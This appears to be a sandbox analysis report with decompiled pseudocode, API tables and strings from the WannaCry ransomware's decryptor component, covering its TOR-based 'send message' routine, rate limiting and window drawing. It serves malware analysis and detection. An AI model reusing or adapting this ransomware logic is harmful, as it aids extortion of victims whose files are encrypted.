									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

















































                                                      0x00405236
                                                      0x00405238
                                                      0x0040523d
                                                      0x0040523e
                                                      0x0040524b
                                                      0x0040524e
                                                      0x00405254
                                                      0x00405369
                                                      0x00405552
                                                      0x0040555a
                                                      0x00405560
                                                      0x00405568
                                                      0x00405572
                                                      0x00405572
                                                      0x0040536f
                                                      0x00405373
                                                      0x0040539e
                                                      0x0040539e
                                                      0x004053a1
                                                      0x004053a4
                                                      0x00405430
                                                      0x00405433
                                                      0x004054b4
                                                      0x004054b6
                                                      0x00405503
                                                      0x00405506
                                                      0x00000000
                                                      0x00000000
                                                      0x0040550b
                                                      0x0040550e
                                                      0x00405511
                                                      0x00405516
                                                      0x00405517
                                                      0x00405519
                                                      0x0040551b
                                                      0x00000000
                                                      0x00000000
                                                      0x0040551d
                                                      0x0040551f
                                                      0x00000000
                                                      0x00000000
                                                      0x00405521
                                                      0x00405523
                                                      0x00405525
                                                      0x00000000
                                                      0x00000000
                                                      0x00405527
                                                      0x00405529
                                                      0x00405534
                                                      0x00405535
                                                      0x00405536
                                                      0x0040553e
                                                      0x00405542
                                                      0x00405545
                                                      0x0040554a
                                                      0x0040554d
                                                      0x0040554f
                                                      0x0040554f
                                                      0x0040554f
                                                      0x00000000
                                                      0x00405529
                                                      0x004054bb
                                                      0x004054be
                                                      0x004054c1
                                                      0x004054c6
                                                      0x004054c7
                                                      0x004054c9
                                                      0x004054cb
                                                      0x004054d1
                                                      0x004054d1
                                                      0x004054d6
                                                      0x004054d6
                                                      0x004054d8
                                                      0x004054da
                                                      0x00000000
                                                      0x00000000
                                                      0x004054dc
                                                      0x004054de
                                                      0x004054e6
                                                      0x004054e7
                                                      0x004054ea
                                                      0x004054ef
                                                      0x004054f1
                                                      0x004054f4
                                                      0x004054f9
                                                      0x004054fc
                                                      0x004054fe
                                                      0x004054fe
                                                      0x004054fe
                                                      0x00000000
                                                      0x00405501
                                                      0x004054cd
                                                      0x004054cf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004054cf
                                                      0x0040543b
                                                      0x0040543f
                                                      0x00405440
                                                      0x00405443
                                                      0x0040544f
                                                      0x00405450
                                                      0x00405453
                                                      0x0040545b
                                                      0x00405468
                                                      0x0040546b
                                                      0x0040546c
                                                      0x0040546d
                                                      0x00405471
                                                      0x00405476
                                                      0x00405479
                                                      0x0040547e
                                                      0x00405487
                                                      0x0040548b
                                                      0x00405494
                                                      0x00405499
                                                      0x004054a2
                                                      0x004054aa
                                                      0x00000000
                                                      0x004054aa
                                                      0x004053b4
                                                      0x004053b5
                                                      0x004053b8
                                                      0x004053c3
                                                      0x004053d1
                                                      0x004053d5
                                                      0x004053d6
                                                      0x004053d7
                                                      0x004053dc
                                                      0x004053dd
                                                      0x004053e7
                                                      0x004053e8
                                                      0x004053e9
                                                      0x004053ed
                                                      0x004053f2
                                                      0x004053f5
                                                      0x004053fa
                                                      0x00405403
                                                      0x00405407
                                                      0x00405410
                                                      0x00405415
                                                      0x0040541e
                                                      0x00405426
                                                      0x00000000
                                                      0x00405426
                                                      0x0040537b
                                                      0x00405381
                                                      0x00405384
                                                      0x00405386
                                                      0x00000000
                                                      0x00000000
                                                      0x00405388
                                                      0x0040538a
                                                      0x0040538c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040538e
                                                      0x00405390
                                                      0x00405393
                                                      0x00405396
                                                      0x0040539b
                                                      0x0040539b
                                                      0x0040539b
                                                      0x00000000
                                                      0x00405390
                                                      0x0040525d
                                                      0x00405285
                                                      0x00405288
                                                      0x0040528d
                                                      0x004052f9
                                                      0x004052fa
                                                      0x004052fb
                                                      0x004052fc
                                                      0x00405303
                                                      0x00405307
                                                      0x00405309
                                                      0x0040530c
                                                      0x00405314
                                                      0x00405319
                                                      0x00405320
                                                      0x00405321
                                                      0x00405322
                                                      0x00405326
                                                      0x0040532b
                                                      0x0040532e
                                                      0x00405333
                                                      0x0040533c
                                                      0x00405340
                                                      0x00405349
                                                      0x0040534e
                                                      0x00405357
                                                      0x0040535f
                                                      0x0040528f
                                                      0x00405295
                                                      0x00405297
                                                      0x00405298
                                                      0x0040529c
                                                      0x004052a0
                                                      0x004052a9
                                                      0x004052b1
                                                      0x004052b2
                                                      0x004052b3
                                                      0x004052b7
                                                      0x004052b8
                                                      0x004052bd
                                                      0x004052c0
                                                      0x004052c5
                                                      0x004052ce
                                                      0x004052d3
                                                      0x004052dc
                                                      0x004052e4
                                                      0x004052e4
                                                      0x00000000
                                                      0x0040528d
                                                      0x00405265
                                                      0x00405268
                                                      0x0040526d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040526f
                                                      0x00405273
                                                      0x00000000
                                                      0x00000000
                                                      0x00405275
                                                      0x00405277
                                                      0x0040527a
                                                      0x0040527d
                                                      0x00405282
                                                      0x00405282
                                                      0x00000000

                                                      APIs
                                                      • #940.MFC42(?), ref: 0040527D
                                                      • #4277.MFC42(?,00000001), ref: 004052A0
                                                      • #923.MFC42(?,00000000,?), ref: 004052B8
                                                      • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                                      • #4129.MFC42(?,?), ref: 004052FC
                                                      • #5710.MFC42 ref: 00405314
                                                      • #922.MFC42(?,00000000,00000000), ref: 00405326
                                                      • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                                      • #940.MFC42(?), ref: 00405396
                                                      • #5710.MFC42(?,?), ref: 004053B8
                                                      • #4129.MFC42(?,?,?,?), ref: 004053D7
                                                      • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                                      • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                                      • #4129.MFC42(?,?), ref: 00405443
                                                      • #4277.MFC42(?,?,?,?), ref: 0040545B
                                                      • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                                      • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                                      • #6778.MFC42(?,00000001), ref: 004054EA
                                                      • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                                      • #6778.MFC42(00000000,?), ref: 00405536
                                                      • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                                      • String ID:
                                                      • API String ID: 2121400562-0
                                                      • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                                      • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 56%
                                                      			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb");
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107);
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}


























                                                      0x004082c0
                                                      0x004082c2
                                                      0x004082cd
                                                      0x004082ce
                                                      0x004082d5
                                                      0x004082df
                                                      0x004082ea
                                                      0x004082f1
                                                      0x004082f9
                                                      0x004082fb
                                                      0x00408304
                                                      0x00408305
                                                      0x0040830d
                                                      0x00408312
                                                      0x0040831a
                                                      0x00408322
                                                      0x0040832b
                                                      0x00408332
                                                      0x00408332
                                                      0x00408342
                                                      0x00408378
                                                      0x0040837f
                                                      0x00408381
                                                      0x00408387
                                                      0x00408391
                                                      0x00408396
                                                      0x0040844d
                                                      0x0040844e
                                                      0x00408450
                                                      0x00408456
                                                      0x00408459
                                                      0x0040845b
                                                      0x00408460
                                                      0x004083af
                                                      0x004083af
                                                      0x004083b5
                                                      0x0040846c
                                                      0x00408477
                                                      0x00408485
                                                      0x00408487
                                                      0x0040848d
                                                      0x0040848f
                                                      0x00408492
                                                      0x00408494
                                                      0x004084c2
                                                      0x004084c9
                                                      0x004084e2
                                                      0x004084ee
                                                      0x004084f3
                                                      0x004084fa
                                                      0x004084fb
                                                      0x004084fc
                                                      0x00408501
                                                      0x00408504
                                                      0x00408506
                                                      0x0040850b
                                                      0x00408512
                                                      0x00408514
                                                      0x00408538
                                                      0x0040853a
                                                      0x0040853c
                                                      0x0040853d
                                                      0x0040853f
                                                      0x00408544
                                                      0x00408544
                                                      0x00408516
                                                      0x00408516
                                                      0x00408518
                                                      0x00408522
                                                      0x00408528
                                                      0x0040852e
                                                      0x00408531
                                                      0x00408531
                                                      0x00408518
                                                      0x00408550
                                                      0x0040855b
                                                      0x00408560
                                                      0x00408496
                                                      0x0040849d
                                                      0x004084a8
                                                      0x004084ad
                                                      0x004084ad
                                                      0x00408562
                                                      0x0040856d
                                                      0x0040857a
                                                      0x0040857a
                                                      0x004083bb
                                                      0x004083c2
                                                      0x004083c8
                                                      0x004083ce
                                                      0x004083d6
                                                      0x004083d8
                                                      0x004083f5
                                                      0x004083fd
                                                      0x00408403
                                                      0x00408404
                                                      0x00408409
                                                      0x0040840a
                                                      0x0040840f
                                                      0x00408413
                                                      0x00408416
                                                      0x00408417
                                                      0x00408418
                                                      0x00408419
                                                      0x00408422
                                                      0x00408429
                                                      0x00408429
                                                      0x00408435
                                                      0x00408440
                                                      0x00408445
                                                      0x00000000
                                                      0x00408445
                                                      0x00408466
                                                      0x00000000
                                                      0x00408466
                                                      0x0040839c
                                                      0x004083a1
                                                      0x004083a3
                                                      0x00000000
                                                      0x00000000
                                                      0x004083a9
                                                      0x004083a9
                                                      0x004083aa
                                                      0x00000000
                                                      0x004083aa
                                                      0x0040834b
                                                      0x0040834d
                                                      0x0040834e
                                                      0x0040834f
                                                      0x00408354
                                                      0x00408354
                                                      0x00408360
                                                      0x0040836b
                                                      0x00408370
                                                      0x00000000

                                                      APIs
                                                      • #4278.MFC42(000003E8,00000000,000003E8,?,?,77005C80), ref: 0040830D
                                                      • #858.MFC42 ref: 00408322
                                                      • #800.MFC42 ref: 00408332
                                                      • #1200.MFC42(Too short message!,00000000,00000000,?,?,77005C80), ref: 00408354
                                                      • #800.MFC42 ref: 0040836B
                                                      • time.MSVCRT ref: 0040837F
                                                      • #540.MFC42 ref: 004083C8
                                                      • time.MSVCRT ref: 004083D6
                                                      • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                                      • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                                      • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                                      • #800.MFC42 ref: 00408440
                                                      • time.MSVCRT ref: 0040844E
                                                      • fopen.MSVCRT ref: 00408487
                                                      • #800.MFC42 ref: 004084A8
                                                      • fread.MSVCRT ref: 004084C2
                                                      • fclose.MSVCRT ref: 004084C9
                                                      • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                                      • time.MSVCRT ref: 00408528
                                                      • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                                      • #800.MFC42 ref: 0040855B
                                                      Strings
                                                      • s.wnry, xrefs: 004084DD
                                                      • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                                      • Too short message!, xrefs: 0040834F
                                                      • Your message has been sent successfully!, xrefs: 0040851D
                                                      • 00000000.res, xrefs: 00408480
                                                      • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                                      • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                                      • API String ID: 1233543560-382338106
                                                      • Opcode ID: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
                                                      • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                                      • Opcode Fuzzy Hash: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
                                                      • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
